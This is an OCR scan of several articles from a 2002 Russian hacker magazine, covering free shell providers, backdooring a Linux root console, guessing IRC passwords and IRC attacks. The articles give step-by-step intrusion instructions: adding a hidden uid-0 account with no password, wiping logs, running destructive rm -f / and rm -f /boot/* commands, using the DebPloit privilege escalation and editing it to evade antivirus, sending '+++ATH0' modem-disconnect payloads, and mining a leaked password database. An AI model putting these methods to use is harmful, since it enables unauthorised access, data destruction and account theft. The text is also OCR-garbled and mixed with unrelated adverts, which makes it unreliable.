Grex central timekeeping. At the Беер, the time is 
6:02AM on Thursday, 31 October 2002 


O48 december/12/2002 


Обычно все инструкции по хаку (даже такому легкому, как 
наш :)) начинаются со слов: «логинься на свой шелл и 
запускай/компиль/конфигурь...». А ведь многих останавливает 
именно это - не зная, что такое WENN и где его взять, 
многие просто опускают руки и идут гамать в СТА (ну или 
какой-нибудь HitMan). 


рис. Артем Симаков 


New to grex? Type help at the login prompt 

(ttyr8) grex login: 

Welcome to the Grex computer conferencing system! If you 
have already run the «newuser» program, you can supply your 


login ID at the «login:» prompt to get into Grex. 


Otherwise, you may select one of the following at the login prompt: 


newuser To create your own login ID, so you can use Grex. 

trouble If you’re having trouble getting something to 
work, and want to send the staff on Grex an e- 
mail message. Don’t forget to tell us who you 
are, and how we can reach you. 

exit If you would like to disconnect right now. 

confused If you're confused about something, and would 


like talk to someone on the phone. 


Grex central timekeeping. At the beep, the time is 
6:03AM on Thursday, 31 October 2002 


New to grex? Type help at the login prompt 


Тут тебе необходимо ввести пем/изег, что укажет серваку на то, что необ- 
ходимо начать процесс регистрации нового аккаунта для доступа к шеллу. 


Сперва тебе ознакомят со всевозможной бурдой, что можно и что нельзя, 
правила использования ит. д. (вот тебе и своеобразная плата за халяву). 
На все это ты смело можешь забить, т.е. смело жмешь Enter. После всех 
этих формальностей в конце концов тебе будет предложено зарегистри- 
роваться, ввести свой логин и пароль; вводишь, воти все! Не ожидал? 


Закрываешь телнет и снова коннектишься к серваку через тот же телнет 
(а возможно, уже у тебя есть свой кульный клиент для работы с удален- 
ным шеллом). В приглашении терминала уже вводишь не Newuser, а свой 
логин и пароль, в ответ получаешь свой фришный шелл, что и требовалось 
доказать! 


Такая процедура регистрации нового пользователя является общеприня- 
той на всех подобных ресурсах, и всех их в отдельности рассматривать не 
имеет смысла, поэтому в конце статьи приводится список наиболее кру- 
тых серваков, дающих фришный доступ к шеллу с коротенькой аннотаци- 
ей каждого. 


Р.5. Кстати, чуть не забыл, не очень хорошая новость: то, что ты получил 
фришный шелл, еще не означает, что ты сможешь юзать весь сервак (дис- 
ковое пространство) и все его сервисы (smtp, pop3, imap3, ftp, ssh ит.д. и 
т.п.) Доступ, функциональность, сервисы и дисковое пространство (кво- 
та) весьма ограничены, ты ведь не один, но для ознакомления и изучения 
этого вполне достаточно. Да, и не пытайся сразу же после получения шел- 
ла пробовать ломать сервак (заливать и компилить эксплоиты или еще что 
похуже), так как, во-первых, у тебя навряд ли что-либо получится (так как 
там все предусмотрено... ну, почти все... короче, сам увидишь), во-вто- 
рых, у буржуев жесткие правила - за подобные нарушения твой аккаунт 


сразу же срубят без предупреждения. Но учитывая, что зарегиться еще 
раз - не проблема, на все эти угрозы можно забить большой болт :). 


Список CEPBAKOB 


1. www.cyberspace.org (также известный как Grex) 
Одна из самых крупных систем, предоставляющих шелл-доступы. Квота на 
1 Мб дискового пространства, и до 75 одновременно открытых сессий для 
одного аккаунта. Система работает на железе и ПО от SUN. 


2. sdf.lonestar.org 
Один из самых быстрых шелл-провайдеров, система работает на NetBSD. 
Поддерживает большое количество одновременно открытых сессий. 


3. m-net.abornet.org 
Большое количество сопутствующих данному сервису док. 


4. пух 
Одна из старейших в сети систем, предоставляющих шелл-аккаунты. 
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ПРЕКРАСНОЕ ДАЛЕКО 


5. vmsbox.cjb.net 
Данный ресурсы предоставляет шелл-аккаунты на основе VMS. 


6. h14me.yi.org 
Отличительной чертой данной системы является наличие фришных bbs. 
Так что для фидошников - ме[соте! 


7. www.publiclinux.net 
Данная система предоставляет линуксовые шелл-аккаунты. 
Телнетимся к pub.dtdns.net 


8. dlss.dhs.org 
Данный ресурс уникален по количеству сервисов, к которым разрешается 
доступ: telnet, ftp, ssh, irc, lynx и др. 


9. shellyeah.org 
Не предоставляющий ничего особенного шелл-провайдер. 


10. ductape.net 
Доступ к дополнительным сервисам, таким Kak IMAP email, web hosting. 


11. rootshell.be 
Обычные шелл-аккунты, 2 Мб дисковой квоты. 
Телнетимся к phenix.rootshell.be 


12. hannover-internet.de/newald 
Данный ресурс предоставляет доступ только по SSH. 
Телнетимся к newald.homeip.net 


13. nether.net 
Обычный шелл-провайдер. 


14. freeshells.com 
Очень хороший ресурс, но в данное время не работает. 
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| ac] [ Ш Е | ( | У тебя сегодня праздник. Твой папашка, или кто-то там еще, 
свалил в ванную (выносить мусор, поесть на кухню, нужное 
подчеркнуть) и оставил тебе подарок... залогиненную 
консоль. Да не просто залогиненную, а под пользователем 
root. Сразу начинают разбегаться во все стороны глаза, а в 


башке крутиться всякие мысли - как бы тебе это 
использовать на всю катушку. Все кричат, типа, Linux 
защищенная и все такое. Ни фига никто не защищен, если 
по дурости оставляет рабочее место, пред этим не 
заблокировав его. По-настоящему защищенная система, 


когда она выключена и спрятана в сейфе. И то могут 
спереть вместе с сейфом :-). 


loker 


рис. Артем Симаков 


ЧТО С ЭТИМ ДЕЛАТЬ? 
Тык-с, оглянись по сторонам и займись делом. Сначала проверим, а точно 
ли ты под пользователем root. Делается это командой id. 
[root@home:opt]# id 

uid=0(root) gid=0(root) 
Bot Tenepb ты точно уверен, что работаешь nog root. Потому что имя поль- 
зователя и вид приглашения могут быть любыми. 
ОК. Давай-ка немного поработаем и немного пошалим. Наделать гадостей 
ты успеешь всегда, а вот сделать все тихо и незаметно - это просто выс- 
ший пилотаж. Самый кайф - наделать гадостей так, чтобы ни одна собака 
не догадалась о том, что в ее системе были гости. 


ГОТОВИМ ПЛАЦДАРМ 


Твоя задача состоит не просто в разовом получении доступа и сотворении 
какой-нибудь пакости, но и в том, чтобы иметь доступ к компьютеру по- 

стоянно в любое время. Для этого надо создать для себя регистрацион- 

ную запись. 

Немного теории. В современных ип1х-системах регистрационная запись о \, 
пользователе состоит из двух частей. Первая, в файле /etc/passwd, содер- _ 
жит имя пользователя, признак парольного входа, идентификатор пользо- hy м 
вателя uid, идентификатор группы gid, полное имя пользователя, домаш- a \ 
ний каталог и командную оболочку. Все это перечислено по порядку. 3a- \ \ 4 
пись выглядит так: 

root:x:0:0:System Administrator:/root:/bin/bash 

Для администратора системы идентификатор пользователя равен 0, иден- ®. р 
тификатор группы также равен 0. 

Вторая часть регистрационной записи находится в /etc/shadow и выгля- 
дит так: 
root:$1a$08$E1U6cAdMNcCruz9ffTJ1m0e23cHpHneRIQrsXZcyEzMgS/Qoeq 
3уе:11937:::::: yf — 
Возможная ценная информация из всего этого мусора выглядит.как на op 
символов и цифирей. Это зашифрованный пароль. Чтобы ero расшифро- #— 
вать, надо иметь кучу времени и супер-пупер компьютер. Ничего этого у’ 
тебя нет, поэтому о взломе пароля трепаться не буду. Придется подойти с 
другого края. ‘ 
Регистрационная запись создается командой adduser или useradd в зави- + 
симости от версии системы. Но ты не ищешь легких путей, и надо ДЕйст- Ри 
вовать хитрее. „р 
В текстовом редакторе открываешь /etc/passwd. Копируешь строчку,”В» ak 
которой есть слово root, и вместо имени пользователя ставишь YTO-HU- ам 
будь свое, что-то похожее на системное, например, [рх. Слова System ss ge 
Administrator тоже можно стереть. Вот что должно получиться после Koz 
пирования: i Ра и 
root:x:0:0:System Administrator:/root:/bin/bash | 


1 
es | 
lpx:x:0:0::/root:/bin/bash 

Я специально в примере указал имя [рх, похожее на lpt, чтобы было менее’, 
подозрительно. И лучше вставить куда-нибудь в серединку, а не добав- 
лять в конец. Теперь открываешь файл /etc/shadow и под строкой с + 
писью root делаешь ee копию, НО стираешь зашифрованный пароль. В ре\ 
зультате должно быть: : 
root:$1a$08$E1U6cAdMNcCruz9ffTJ1m0e23cHpHneRIQrsXZcyEzMgS/Qoeq 
3уе:11937:::::: 


[рх::11937:1:5: 

Не забудь сохранить свой нетленный труд. 

После проведения всех этих волшебных действий ты в любое время мо- 
жешь зайти в систему под пользователем lpx и без пароля. 
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СКРЫВАЕМ СЛЕДЫ 


Любое действие пользователя в системе обязательно фиксируется. Если 
ты не врубаешься, я повторяю - ЛЮБОЕ. Вход, выход, выполнение команд, 
короче - все. Соответственно, есть файлы, в которых эта информация хра- 
нится. Они называются системными журналами, а по-нашему - логами. 
Чтобы скрыть следы твоего присутствия в журналах, придется заняться 
уборкой мусора. 
Основной журнал хранится в файле /var/log/messages или в 
/var/adm/messages в зависимости от дистрибутива Linux. Это обычный 
текстовый файл, и он может быть отредактирован в текстовом редакторе. 
Ты понял, к чему я клоню? Правильно! Этот файл можно поправить в нуж- 
ную тебе сторону. Достаточно просто удалить строчки, где фиксируется 
вход под твоим новым логином. Вот пример такой записи: 
Окт 25 10:27:29 home РАМ_рм [11610]: (su) session opened for user 
root by lpx(uid=0) 
В других журналах каталога /var/log (/var/adm) хранятся сведения о pa- 
боте почтовых сервисов и других программ. 
Еще система хранит в логах время, проработанное пользователем, а так- 
же время входа и выхода из нее в файлах /var/log/wtmp и /var/run/utmp. 
Править их по-шустрому не получается, поэтому достаточно просто дать 
команду: 
echo -пе > /var/log/wtmp 
echo -пе > /var/run/utmp 
После этой процедуры файлы обнулятся. Надейся и трепещи, что твой па- 
пашка, или кого ты там собрался хакать, не заметит этого. Туда вообще 
редко кто заглядывает. 
Когда пользователь запускает на выполнение команды, они тоже фикси- 
руются. При использовании командной оболочки bash список истории 
команд хранится в файле .bash_history в домашнем каталоге. Так как ты 
используешь домашний каталог /root для работы, то смотреть надо там. 
Список редактируется любым текстовым редактором. 
Такой же список команд хранит любая командная оболочка, но название 
файла может отличаться. Например, файловый менеджер тс хранит исто- 
рию команд в подкаталоге .mc/history. 
Короче. С заметанием следов немного разобрались. Поехали резвиться в 
захваченной системе дальше. 


ГРЯЗНЫЕ ТАНЦЫ 


Нагадить горячо любимому соседу можно по-всякому. Сразу говорю, что 
все, что тут я тебе наплету, может иметь самые хреновые для тебя послед- 
ствия, поэтому миллион раз подумай, прежде чем что-то делать. Также 
оговорюсь, что все действия должны выполняться из-под администрато- 
ра, иначе ни фига не получится. 


ГАДОСТЬ ПЕРВАЯ, ТУПАЯ 


Можно стереть все к чертям собачьим следующей командой: 

rm -f / 

rm - это команда удаления. Опция -f заставит ее не задавать вопросов, ну 
а / означает, что ты собираешься тереть корневой каталог. Команда убь- 
ет все, что есть на винте или Ha Linux разделе. Это сурово, но и последст- 
вия проявятся тут же. Так что после выполнения этой шняги тебе надо 
сразу смываться. И очень быстро. 


ГАДОСТЬ ВТОРАЯ, ОТЛОЖЕННАЯ 


Можно прогуляться в каталог /boot и стереть все оттуда. Например, таким 
макаром: 

rm -f /boot/* 

Тут все просто и понятно. Но последствия гадости будут видны только после 
перезагрузки. Система не сможет загрузиться. Совесть, если она у тебя еще 
осталась, пусть не болит - систе- 
му за Пару часов можно восста- 
НОВИТЬ В рабочее состояние. 


ГАДОСТЬ ТРЕТЬЯ, ОЧЕНЬ 
ТОНКАЯ И ХИТРАЯ 


Это практически восточная га- 
дость. Срабатывает Ha Linux, с 
файловой системой ext2 и ext3 
точно, с другими я не тестиро- 
вал. Скорее всего, на 90% у тво- 
его пациента стоит ext2. Чтобы 
проверить, дай команду mount, 
и, если увидишь что-то вроде 
/dev/hda6 on / type ext2, значит 
мы готовы к гадости. 

Прелесть заключается в такой 
штуке, как атрибуты файловой 
системы. Так вот, с помощью ути- 
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ИЗИ ШЕЛЛ ДВУМЯ ПАЛЬЦАМИ 


литы chattr можно сделать так, что даже администратор, к примеру, не смо- 
жет записать файл в каталог или стереть его оттуда. И будет долго ломать 
голову, если сразу не догадается. Дав команду chattr +i /bin, ты защищаешь 
каталог от записи. Это ничем с виду не страшно, но, например, новая про- 
грамма из пакета уже не инсталлируется. Установив этот атрибут на файл с 
документом, потом нельзя будет в него внести изменения. Видишь, какие 
мы хитрые - средства защиты превратили в средства нападения. 


OUT 


Ну вот. Рассказал я тебе немного о шалостях и гадостях. Еще раз говорю, 
что это тебе только для примера, чтобы ты понял, что можно сделать с ма- 
шиной, за которой никто не присматривает. А посему мой тебе чисто дру- 
жески совет: не будь лохом и НЕ ОСТАВЛЯЙ залогиненную консоль, уходя 
даже на 5 минут. 

С бестовыми вишезами, Loker. 
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PUNOCOPUA 
NODBOPA 
ПАРОПЕЦЧЦ 


пособие по хаку ников 


и каналов в IRC 


Андрей Каролик (andrusha@s1.ru) 


Идея заключалась в том, чтобы проанализировать уже имеющиеся паро- 
ли и попытаться найти любые закономерности в этих паролях. Тогда ты 
сможешь в дальнейшем перейти от вялых попыток подбора методом тыка 
(с нулевым результатом) к осмысленному и более эффективному подбору 
паролей, используя эти закономерности. 


КАК РОЖДАЕТСЯ ПАРОЛЬ 


Кто бы ни пришел на ирку, основное его желание - пообщаться. Регистра- 
ция ника - второстепенное дело, дающее всего лишь ощущение сухости и 
защищенности. Поэтому многие больше думают о том, чтобы не забыть 
пароль, и делают его максимально простым, что является роковой ошиб- 
кой. Конечно, так делают далеко не все, но большинство все-таки начина- 
ет задумываться об этом уже после того, как их ник кто-то взламывает. 
Другое дело, что ники далеко не всех подвергаются хаку, в основном это 
ники фаундеров каналов или людей, имеющих акцессы на этих каналах. 
Ну и, конечно же, ники операторов сети :). По какому же принципу люди 
придумывают свои пароли? Кто как, но в 98% случаев пароль осмыслен- 
ный - в отличие от произвольной генерации паролей у тех же провов при 
получении аккаунта. Все зависит от времени года, дня недели и даже вре- 
мени суток, в которое происходит регистрация ника. Кто-то зациклен на 
кличке своей кошки, кто-то на имени любимой (или нелюбимой) девуш- 
ки, а кто-то мучается с запоминанием пин-кода от пластиковой карточки. 
Наболевшее и выливается в виде пароля к нику, так как все, что связано 
с переживаниями, очень легко запоминается. 


ХИТ-ПАРАД ЛАМЕРСКИХ ПАРОЛЕЙ 


Далеко не все утруждаются придумыванием хоть сколько-нибудь слож- 
ных паролей (или им не дано), в результате 3,3% от всех паролей (всего 
2795) составляют всего лишь пять самых простейших комбинаций: 

1) password - 24 

2) 123456 - 22 

3) 12345 - 19 


) 
4) 11111-17 
) 


5) qwerty - 9 


За основу материала была взята реальная 
база данных ников сети DalNet(RU) 
(www.dalnet.ru) полугодовалой давности. 
Количество ников в базе - 2795! 
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Практически у любого сидящего в ирке (IRC) рано или позд- 
но возникает соблазн хакнуть чужой ник или канал. Но после 
десятка (а может и сотни) безуспешных попыток подобрать 
пароль методом тыка идея подыхает. И возникает вопрос - а 
paride ли в принципе подобрать пароль к нику или каналу? 

тобы ответить на этот вопрос, я достал базу с паролями к 
2795 реальным никам! 


рис. Ровер 


А таких простейших паролей с другими комбинациями наберется не один 
десяток, что, по моим скромным подсчетам, составляет до 10 процентов от 
общего числа всех паролей. Меня, честно говоря, это поразило, но с гени- 
альной простотой ты можешь с ходу сломать десятую часть ников. Могу 
только огорчить, что после выхода в свет этого номера Спеца количество 
подобных ников резко начнет уменьшаться :). 


ЛОМАЙ ОСМЫСЛЕННО 


С ламаками все понятно, а как быть с остальными 90% иркоманов? Тут 
подбор придется систематизировать, делая его по определенным крите- 
риям и в последовательности от более простого к более сложному. Уро- 
вень сложности, до которого ты готов дойти, потратив кучу собственного 
времени, определишь сам, а вот с критериями я тебе помогу. Как говорит- 
ся, сколько людей - столько и паролей. Но все равно между некоторыми 
паролями есть общие закономерности и даже совпадения. Проанализи- 
ровав 2795 паролей, я выделил следующие критерии подбора: 


наиболее обиходные слова (односложные) из английского языка; 
жаргонизмы английского языка; 

матерные слова иностранного происхождения, примеров не привожу :); 
имена (свои или чужие); 

фамилии (свои или чужие); 

ники (свои или чужие); 

повторы сочетаний произвольных букв (чаще всего двух, реже трех), к 
примеру, lololol или ahahah; 

- повторы сочетаний произвольных цифр (чаще всего двух, реже трех); 

- номера телефонов (своих или чужих), причем с возможной перестанов- 
кой цифр или чтением задом наперед; 

- номера ИТ№-ов (своих или чужих), причем с возможной перестановкой 
цифр или чтением задом наперед; 

- Р1№-коды от карточек или других безделушек (своих или чужих), причем 
с возможной перестановкой цифр или чтением задом наперед; 

- сочетания со словом pass или password, к примеру, mypass; 

- название прог, фирм или железок, самым оригинальным было mirc32 и 
microsoft ;); 

- название каналов (своих или чужих); 

- мыльники или иденты (свои или чужие). 


Еще одну разновидность паролей хочу отметить отдельно, поскольку 
она очень обширна, но при этом очень сложна для перебора - набор на 
клавиатуре по-русски с включенной латиницей. В результате получает- 
ся абракадабра латинскими буквами, которую можно прочесть, если 
найти латинские буквы на клаве и сопоставить с русскими буковками 
на этих же клавишах. Сложность подбора состоит в том, что эти слова 
слишком разнообразны, а усугубляется это еще и тем, что используют 
искаженные слова (например, lfdfkrf) или уменьшительно-ласкатель- 
ные формы (например, gjl]t,jyxbr). Но чаще всего это имена, животные, 
предметы, хобби, действия или матерные слова. Были и экзотические 
пароли: номер школы, номер машины, день рождения, из нескольких 
слов через знак подчеркивания и т.п. Самый длинный пароль составил 
32 символа! Еще одно личное наблюдение - даже с учетом того, что на 
сервисах, с которых была взята база по никам, была возможность зада- 
вать пароли кириллицей, всего 24 человека из 2795 воспользовались 
этой возможностью. Остальные использовали в паролях латиницу и ци- 
фры. При этом количество паролей, состоящих исключительно из цифр, 
было более 600 (более 22%). Всего лишь около 250 умников (около 
9%) использовали в паролях и латиницу, и цифры одновременно. Oc- 
тавшаяся часть (около 68%) ограничилась использованием в паролях 
только латинских букв. Самыми неприступными для подбора являются 


ники, состоящие из цифр и букв одновременно, либо не имеющие 
смысла (например, f_k@jh#). Их уже надо как-то своровать с тачки 
жертвы либо просто смириться с действительностью и запинговать на- 
хала до смерти :). 


Список слов, жаргонизмов и матерных выражений ты составишь сам. А 
вот подбирать ники, фамилии, имена, телефоны, шп-ны и руп-коды на пу- 
стом месте было бы самоубийством. Проще всего эту информацию запо- 
лучить от самой же жертвы. Для этого придется временно перевоплотить- 
ся, сменив свой стиль общения и ник. Если предстоит разводить чувака, 
то нужен ник девчонки, а если чувиху - ник парня. Дальше все полностью 
зависит от твоей коммуникабельности и терпения. Возможно, на пытки 
уйдет не один день. Сам понимаешь, что никто тебе не выложит свои дан- 
ные и данные знакомых в первый разговор. Но если игра стоит свеч - вер- 
буй и действуй. Иногда оказывается очень ценной информация о любых 
паролях, которые когда-либо придумывал этот чел. Никто обычно не за- 
думывается о том, что каждый новый пароль придумывается машинально 
и зачастую он подобен всем остальным, если вообще в точности не по- 
xox. У меня лично был случай в сети DalNet, когда мне удалось подобрать 
пароль к каналу #russian, зная пароли фаундера канала к его трем фтп- 
серверам. Оказалось, что он придумывал все пароли по одной и той же 
схеме, чем я и воспользовался. 


Увлекшись подбором чьего-либо пароля, не забывай, что точно так же мо- 
гут подобрать и твой собственный пароль. Чтобы забыть об этой пробле- 


ФИЛОСОФИЯ ПОДБОРА ПАРОЛЕЙ 


ме, один раз грамотно придумай себе пароль. Никто тебе не запрещает 
связать его логически со своими воспоминаниями, но в обязательном по- 
рядке включи в него и цифры, и буквы (или спецсимволы). Приведу про- 
стой пример. Пароль password ломается без проблем, так как при перебо- 
ре первым приходит в голову (кстати, победитель хит-парада ламаков). 
Но стоит его видоизменить - pass#word_666 - и он становится неприступ- 
ным! 


Любые действия пользователей сети всегда могут отследить операторы 
сети, которые бдят :) день и ночь за нерадивыми жителями ирки. И, если 
ты не хочешь заработать акилл (бан на всей сети) на свою задницу, то 
всегда бери левый ник перед тем, как подбирать пароль к другим никам. 
Аналогично, если ты сидишь с постоянным хвостом, тебе будет необходи- 
мо накопать для себя прокси. Отследить попытки перебора паролей мож- 
но как в онлайне, так и по логам, которые постоянно пишутся. Конечно, 
чем больше по размерам сеть, тем сложнее отслеживать подобные махи- 
нации, но подстраховка никогда не бывает лишней. 


Теперь перед попыткой взлома ника или канала спроси его владель- 
ца, читал ли он этот номер Спеца. Если ответ будет утвердительным, 
то попытка подбора пароля будет пустой тратой времени :). 
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эксплойте, который позволяет выполнять любую программу 


О [= = } LO [ [ > расскажу об одном маленьком, но очень полезном 


локальный руткит под Win2k 


под правами администратора в операционных системах 
семейства Windows МТ. Этот незаменимый для «легкого 
взлома» эксплойт носит название DebPloit. Название 
произошло от двух слов: Debug & Exploit. Сейчас станет 
ясно, почему. 


Андрей Ковалев ака Drone (drone@nm.ru), http://funmp3.hoha.ru 


КАК ОНО РАБОТАЕТ? 

Дело в том, что некоторое время назад некто ELICZ обнаружил очень серь- 

езную уязвимость в подсистеме отладки (Debugging SubSystem) МТ-шки. 

Принцип работы эксплойта следующий: 

1. Надо стать 4 9$5-клиентом (функция DbgUiConnectToDbg). 

2. Далее подключаемся к DbgSsApiPort LCP-nopty (используя функцию 
ZwConnectPort). Любой юзер с любыми правами может это сделать! 

3. Посылаем запрос на отладку процесса к dbgss точно так же, как это де- 
лает CreateProcess (функция ZwRequestPort). 

4. Ожидаем ответа CREATE_PROCESS_DEBUG_EVENT от 4695$ (функция 
WaitForDebugEvent). Ответ будет содержать описатель (handle) про- 
цесса. 

5. Переключаем свой текущий уровень безопасности на контекст безо- 
пасности, полученный на шаге 4. 

6. Исполняем код (запускаем внешнюю программу) с правами выбранно- 
го для отладки процесса. 

7. При выгрузке отладчика (например при LogOff) наш процесс также вы- 
гружается, как будто он был просто отлажен, как обычно. 


ХИНТСЫ 


Для тех, кто захочет поподробнее разобраться в принципе работы экс- 
плойта, у меня есть хорошая новость. В комплект поставки DebPLoit-a, по- 
мимо откомпилированных экзешников (адрес, с которого можно скачать 
эксплойт, следующий: 
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip), входят также и ис- 
ходники! Так что если захочешь сделать, например, чтобы AVP, как только 
увидит эксплойт, не начинал кричать: «Внимание! Обнаружен Вирус 
Exploit.WinNT.DebPloit!», то достаточно лишь немного изменить исходный 
код, и глупый AVP больше не найдет никакого «вируса». Или же если 
вдруг ты захочешь придать эксплойту би1-интерфейс... Да мало ли еще 
для чего? Пожалуйста! Исходники под рукой. 

Данный эксплойт полностью работоспособен в таких операционных сис- 
темах, как MS Windows NT 4.0 и MS Windows 2000. К сожалению, Microsoft 


В нашем примере мы под правами гостя 
(Guest) запустим редактор реестра 
(regedit.exe), который, естественно, 

под правами гостя запускаться 

никак не должен. 
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Если система уязвима, то программа 
сразу после запуска выдаст строчку 
«DebPloit is Avaiable!». 


уже выпустила Update, который устраняет данную уязвимость, но ведь не 
факт, что все администраторы вовремя обновляют свои операционные 
системы (представь себе, что значит для админа поставить один малень- 
кий хотфикс на N компов клуба, аудитории или офиса). 


ИСПОЛЬЗУЕМ УЯЗВИМОСТЬ 


Перво-наперво разархивируем 71р-архив и посмотрим, что интересного 
лежит внутри. Папки ОРЯх и Hotfix Ham не нужны. В них находятся ком- 
ментарии, с помощью которых можно залатать дыру. А вот в директории 
Examples лежит то, что нам надо: сам откомпилированный эксплойт 
(ERunAsX.exe) и еще одна программа, позволяющая проверить систему 
на уязвимость(Т5АуааЩе.ехе), которую мы прямо сейчас и запустим. Ес- 
ли система уязвима, то программа сразу после запуска выдаст строчку 
«DebPloit is Avaiable!». Если так произошло, то все в порядке! Можно 
считать, что права администратора уже у нас в кармане ;). Если же тебе 
не повезло, то это может означать лишь то, что системный администратор 
не такой лох, как ты думал, и придется искать другие пути «легкого взло- 
ма» ;). 
Будем надеяться, что админ не успел вовремя обновить систему. Тогда 
прямо сейчас ты можешь, практически не прилагая никаких усилий, запу- 
стить любую программу с правами администратора. В нашем примере мы 
под правами гостя (Guest) запустим редактор реестра (regedit.exe), кото- 
рый, естественно, под правами гостя запускаться никак не должен. 
Для этого вызываем командную строку(ст@.ехе), заходим в нужную пап- 
ку и запускаем ЕКипА$Х.ехе с параметром, указывающим нужную нам 
программу. В нашем случае: «ЕКипА$Х.ехе regedit.exe». Все! Запустился 
редактор реестра с правами администратора. Более легкий хак приду- 
мать сложно. Вместо regedit.exe можно запустить любую программу. К 
примеру, cmd.exe - админская консоль, или ттс.ехе - Microsoft 
Managment Console. Хотя что я рассказываю? Думаю, что и без моих со- 
ветов ты найдешь достойное применение этому замечательному экс- 
плойту. Удачи! 
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Караул! Единственный 
выход Для Вас - срочно 


включить радио "Жит-ЕМ" 


и слушать, слушать, 
слушать... И все у Вас 
получится! 
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Ну что ж, у Вас все 
довольно мило и удачно. 
Почацце настраивайтесь 
на волну "Жит-ЕМ", и 
везение Вам никогда не 
изменит! 
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Поздравляем! ЕЗы - 
любимец Фортуны и 
идеальный слушатель 
радио "Жит-ЕМ"! 
Оставайтесь с нами, а уж 
мы. о-о-о, в долгу не 
останемся! 


гопныны 


геа1 . хакер. ги) 


Здорово, маза хакер! Сегодня мы отдыхаем, и ломать бошку 


B попытках поломать пальцовый сервант как-то ломает :). 
Будем просто развлекаться! Злобно так, мерзко. Изя Хак, 
если он реально Изя Хак, должен уметь хотя бы подсадить 
трояна, вырастить шестизначный юин и выкинуть кого-нибудь 
с IRC. Хуцкеры должны сидеть в Ирке, потому что это круто! 


А порвать ламу коннект, а потом картинно разложить пальцы 
перед всем каналом - это вообще мегарулеззз :). Ты не 
слышал про IRC?! Тогда ты - не Изя Хак и даже не его 
родственник. Просвещайся срочно! 


рис. Борис Алексеев 


МИКРОЛИКБЕЗ 


IRC (Internet Relay Chat) - это куча взаимосвязанных серверов, которые 
позволяют людям поболтать в сети, обсудить проблемы и траблы, задать 
вопросы спецам (если затусишь на соответствующие каналы), обменяться 
файлами и даже трейдить разным виртуальным стаффом. Для этого у те- 
бя должен быть клиент: MIRC или Pirch для Винды или какая-нибудь X- 
Bitch для *п1х’ов. Чат организован в виде тучи каналов по интересам. Юз- 
вери лазят по этим каналам и ищут себе единомышленников. Фишка в TOM, 
что ты сам легко можешь зарегить канал, собрать там своих друзей, рас- 
крутить его, привлечь народ и быть там царем и Богом. Владельцы канала 
становятся опами. Оп следит за каналом, чтобы всякие черти там не безо- 
бразничали, и может выкинуть (kick) и забанить (ban), то есть запретить 
ходить вообще любому посетителю канала. Клево! Тебя все слушаются и 
уважают :). Так вот, опы часто понтуются или один канал мешает другому, 
отнимая аудиторию, тогда начинается ТВС-война, захваты и перезахваты 
каналов. Для нас важен еще один момент: Ирка имеет Whois, и засветить 
ТР’шник любого болтуна - как два байта переслать (не всегда, конечно). И 
еще один бонус: в Ирке сразу виден эффект твоей злобной акции. Только 
что сидел чел, молотил клаву, и вот его уж нет... 


ЦЕЛКАЯ МЕЛЬ 


Что мы хотим? На самом деле, развлечься. Захватить канал описанными 
ниже методами вряд ли удастся, если только опы - не полное тупое, не- 
проходимое ламо. Соответственно и будем подбирать наши жертвы. Это 
перцы и перчинки, которые ничего не знают и знать не желают о хаке и 
безопасности, а просто сидят в Ирке и трепятся, просерая драгоценное 
он-лайновое время. Их надо найти и уничтожить, потому что они - мясо. 
Впрочем, пусть совесть тебя не мучает - особого вреда ты им не прине- 
сешь, а когда отвяжешься, небо над ними снова будет безоблачным. 


056 december/12/2002 


ТЕАТР ВОЕННЫХ ДЕЙСТВИЙ 
Предположим, что клиент у тебя стоит, и коннект с Инетом налажен. Ты - 
не чайник, поэтому без труда заполнишь окошки формы настройки и вы- 
берешь одну из ТВС-сетей, что-то типа DALnet или Кизпе{. Дави коннект, 
и ты - в сети. Перед тобой вывалится форточка со списком каналов 
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Тоже мне защита! 


(#имя_канала), только это все лажа, потому что большинства каналов с 
такими именами либо нет вообще, либо они пустые. Так что ты окажешь- 
ся на канале с опской «плюшкой» (@), но в полном одиночестве. Можешь 
зарегить канал за собой и кикнуть себя на хрен. В общем, лезь в поиско- 
вик и вводи что-то вроде «DALnet каналы», и изучай ссылки. В идеале 
нужно найти какой-нибудь рейтинг популярных каналов. Добавь имя по- 
нравившегося канала в папку каналов и джойнься (Join) на него. Теперь 
осмотрись, выясни, о чем, в основном, здесь трут терки, - о письках-бан- 
тиках или об оргазмическом ковырянии в сырцах ядра FreeBSD. Многие 
каналы имеют сайты, по ним тоже можно сделать пару выводов о крутиз- 
не ченела. С крутыми каналами лучше не связываться, потому что челы 
там грамотные, сидят явно не под Вынью и висят на выделенках (дайлапа 
отдыхает). Я, как истинный мачо, выбрал канал #°ех (да простят меня его 
посетители :)). Итак, место определено - здесь мы и будем устраивать са- 
тан. Пошли за софтой. 


БИГ ГАНЗ 


Поскольку мы с тобой сейчас тупим как «трешка» (третий «пень» имеется 
в виду :)) и заморачиваться с установкой и настройкой скриптов нас не 
климатит, будем юзать самое тупое, что только есть на свете, - нюки (хо- 
тя, надо отдать должное их создателям, они явно не тупили). Итак, я от- 
смотрел для тебя несколько прог и выбрал парочку достойных рабочих 
экземпляров. Это XPING, разработанный xPoison’om, и Voidozer производ- 
ства Teem Void. Ты легко найдешь их в поисковиках именно под этими 
именами, так как многочисленные хацкеры выложили копии этих прог на 
своих хоумпагах, хотя мертвых линков и битых архивов тоже много. Допу- 
стим, ты все скачал (благо, качать немного). 


ПОЛОЖЬ ТРУБКУ! 


Итак, xPING версия 1.4, как справедливо отмечает автор, - это «вроде 
нюкер, а вроде и нет. ..». Некий чел ObiluarY нарыл инфу, что некоторые 
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Вот мы и нарыли 1Р’шник. Берегись! 


мопеды имеют багу: они не соответствуют Hayes стандарту и после полу- 
чения escape последовательности (+++) не держат паузу в 500-1000 мси 
падают в командный режим. После этого им можно скормить любую АТ- 
команду. xPing генерит ТСМР-пакет (ping) со строкой +++ATHO, и бажный 
момед послушно вешает трубку :). Ты прикинь, от этой шняги не спасут 
даже персональные файерволлы, которых понаставили в последнее вре- 
мя ламаки! Пакет даже не дойдет до огнестенки, потому что модем пода- 
вится раньше. Плюс полная анонимность, так как запалить твой ТР’шник 
жертва не сможет. 

Прога умеет передавать еще две команды. Строка +++ATL3M2 врубает ди- 
намик на полную, и завывания модема будят весь дом. Команда 
+++ATS7=1&WO8&YO - устанавливает паузу между набором номера и нача- 
лом соединения равной 1 секунде и записывает эти установки в память 
модема (модем просто вешает трубку сразу после набора номера провай- 
дера). Можно выкинуть юзверя надолго... 

Есть трабла: такая же бага может быть и у твоего мопеда (то есть он пер- 
